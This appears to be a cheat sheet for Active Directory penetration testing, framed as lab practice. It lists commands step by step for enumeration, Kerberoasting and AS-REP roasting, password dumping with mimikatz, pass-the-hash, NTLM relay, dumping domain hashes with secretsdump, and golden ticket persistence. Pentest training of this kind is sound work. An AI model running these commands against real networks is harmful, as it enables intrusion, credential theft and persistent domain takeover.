search

Quick Guide To AD Pentesting

๐Ÿ”ฅ Step-by-Step AD Pentesting Cheat Sheet

hashtag
1๏ธโƒฃ Enumeration (Always Start Here!)

Your goal: Find Users, Computers, Groups, and AD Misconfigurations.

๐Ÿ”น Basic Enumeration (No Credentials) โœ… nmap -p 88,135,139,389,445,464,593,636,3268,3389 --script=ldap* --script=smb* <target> โœ… smbclient -L //target -N โ†’ Check SMB Shares โœ… crackmapexec smb <target> โ†’ Check SMB, Users, and Shares โœ… kerbrute userenum -d domain.com --dc <DC-IP> usernames.txt โ†’ Find Valid Users

๐Ÿ”น Detailed Enumeration (With Credentials) โœ… bloodhound-python -u user -p pass -d domain.com -c All -dc-ip <DC-IP> โ†’ Full AD Mapping โœ… rpcclient -U 'user%pass' <DC-IP> โ†’ Query AD Info โœ… net group "Domain Admins" /domain โ†’ Check Domain Admins โœ… net user /domain โ†’ List All Users โœ… crackmapexec ldap <DC-IP> -u user -p pass --asreproast โ†’ Check for AS-REP Roastable Accounts

๐Ÿ“Œ If You Find Null SMB Shares or Weak Users โ†’ Move to Exploitation.

hashtag
2๏ธโƒฃ Exploitation (Privilege Escalation & Lateral Movement)

Your goal: Escalate Privileges from a Low-Level User.

๐Ÿ”น Kerberoasting (If Kerberos Enabled) โœ… GetUserSPNs.py -dc-ip <DC-IP> domain/user:pass -request โœ… john --wordlist=rockyou.txt hash.txt

๐Ÿ”น AS-REP Roasting (If User Doesnโ€™t Require Pre-Auth) โœ… GetNPUsers.py -dc-ip <DC-IP> -usersfile users.txt domain/ -format hashcat โœ… hashcat -m 18200 hash.txt rockyou.txt --force

๐Ÿ”น Pass-the-Hash / Pass-the-Ticket (Lateral Movement) โœ… mimikatz.exe โ†’ sekurlsa::logonpasswords โ†’ Steal Passwords โœ… psexec.py domain/user@target -hashes LM:NT

๐Ÿ”น NTLM Relay Attacks (If SMB Signing is Disabled) โœ… ntlmrelayx.py -t smb://target --smb2support

๐Ÿ“Œ If you get a higher-privilege account โ†’ Use It for Full Compromise.

hashtag
3๏ธโƒฃ Full Domain Compromise (Domain Admin Access!)

Your goal: Get Domain Admin and Dump All Passwords.

๐Ÿ”น Check if You Are a Domain Admin โœ… whoami /groups โœ… net group "Domain Admins" /domain

๐Ÿ”น Dump All AD Hashes (If DA Access) โœ… secretsdump.py -dc-ip <DC-IP> domain/admin:password@target

๐Ÿ”น Golden Ticket Attack (Persistence) โœ… mimikatz.exe โ†’ kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXXX /krbtgt:HASH /ptt

๐Ÿ“Œ Once You Get DA โ†’ You Have Fully Compromised the Domain!

hashtag
๐Ÿ”ฅ How to Know What to Use in a Lab? (Decision-Making Tree)

โœ… 1. Do I have credentials?

  • โŒ No โ†’ Start with Enumeration

  • โœ… Yes โ†’ Use BloodHound & CrackMapExec

โœ… 2. Can I Kerberoast / AS-REP Roast?

  • โœ… Yes โ†’ Extract Hashes & Crack Them

  • โŒ No โ†’ Try Lateral Movement

โœ… 3. Do I have SMB, LDAP, or Kerberos Misconfigurations?

  • โœ… Yes โ†’ Exploit Using NTLM Relay, Pass-the-Hash, or Kerberos Attacks

  • โŒ No โ†’ Look for Local Privilege Escalation on Workstations

โœ… 4. Do I have Domain Admin access?

  • โœ… Yes โ†’ Dump Hashes & Maintain Access

  • โŒ No โ†’ Pivot to Another User or Machine

hashtag
๐Ÿ”ฅ Next Steps for You

  • Use this step-by-step method in any AD lab.

  • Start practicing each attack individually on TryHackMe (THM) & Hack The Box (HTB).

  • Use BloodHound to visualize attack paths (this helps a lot).

  • If stuck, Google specific errors & read writeups (everyone does this, even pros).

Previous0. AD PentestNextActive Directory: Full Attack Name

Last updated